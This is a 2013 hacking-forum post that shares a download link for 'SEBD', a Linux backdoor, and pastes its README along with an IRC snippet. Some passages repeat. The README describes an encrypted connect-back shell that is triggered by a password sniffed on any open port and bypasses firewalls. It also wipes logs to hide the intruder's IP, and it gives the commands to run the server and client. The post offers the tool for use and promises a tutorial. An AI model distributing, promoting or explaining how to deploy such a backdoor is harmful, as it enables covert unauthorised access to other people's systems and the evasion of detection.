SEBD - Simple Encrypted Backdoor for Linux 10-01-2013, 04:44 AM
#1
http://mybb.rsadvance.net/sebd-0.2-new.tgz
I found this on an excursion to the land of EFnet and decided I'd share it.
This is an interesting little backdoor for Linux and other Unix-like OSes and I'll be writing a tutorial on how to use it soon. Watch this space. Should be up by tomorrow.
Until then, have a c/p from the README file.
Configure script does all the editing config.h for you, I removed that bit after realizing that.
I found this on an excursion to the land of EFnet and decided I'd share it.
This is an interesting little backdoor for Linux and other Unix-like OSes and I'll be writing a tutorial on how to use it soon. Watch this space. Should be up by tomorrow.
Until then, have a c/p from the README file.
Quote:[23:48:24] Oni | SL: So I could set it to 80 on box running apache/nginx?Instructions for compiling: ./configure;make
[23:48:36] Oni | SL: on a*
[23:48:40] Starfall: it "listens on all ports" using a pcap-based sniffer
[23:48:47] Starfall: the SERVER_PORT is the port you're receiving the back connect shell on
[23:48:49] Oni | SL: Ah.
Configure script does all the editing config.h for you, I removed that bit after realizing that.
slider Wrote:sebd v0.1 (simple encrypted backdoor)
sebd is another linux backdoor.
what does sebd provide:
- a raw sniffer
- aes encrypted shell
- full tty/pty support
- connect back (bypass moust of the firewall's)
- does not open a port
- you can log in on any opened port
- cleans the logs (wipes out the ip from where the sniffer received the password)
- tcpd function (if the pasword is from an ip that isn't in the list -> no shell)
- password is encrypted with DES (hardcoded only in the server binary)
usage:
on the server host run: ./sebd
on the client host run: ./client -h host|ip -d port
AUTHOR: slider
EMAIL: slider@go.ro
PS: check out the CREDITS...it's only a hack
PGP
Sign: F202 79C9 76F7 40BB 54EC 494F 5DEF 1D70 14C1 C4CC
Encrypt: A5B3 1B21 55E1 80AF 4C6E DE83 467B 8EFC 3DEE 681C
Auth: CD55 E8A5 1A08 2933 8BA6 BC88 D81F 1943 739A 3C47
Sign: F202 79C9 76F7 40BB 54EC 494F 5DEF 1D70 14C1 C4CC
Encrypt: A5B3 1B21 55E1 80AF 4C6E DE83 467B 8EFC 3DEE 681C
Auth: CD55 E8A5 1A08 2933 8BA6 BC88 D81F 1943 739A 3C47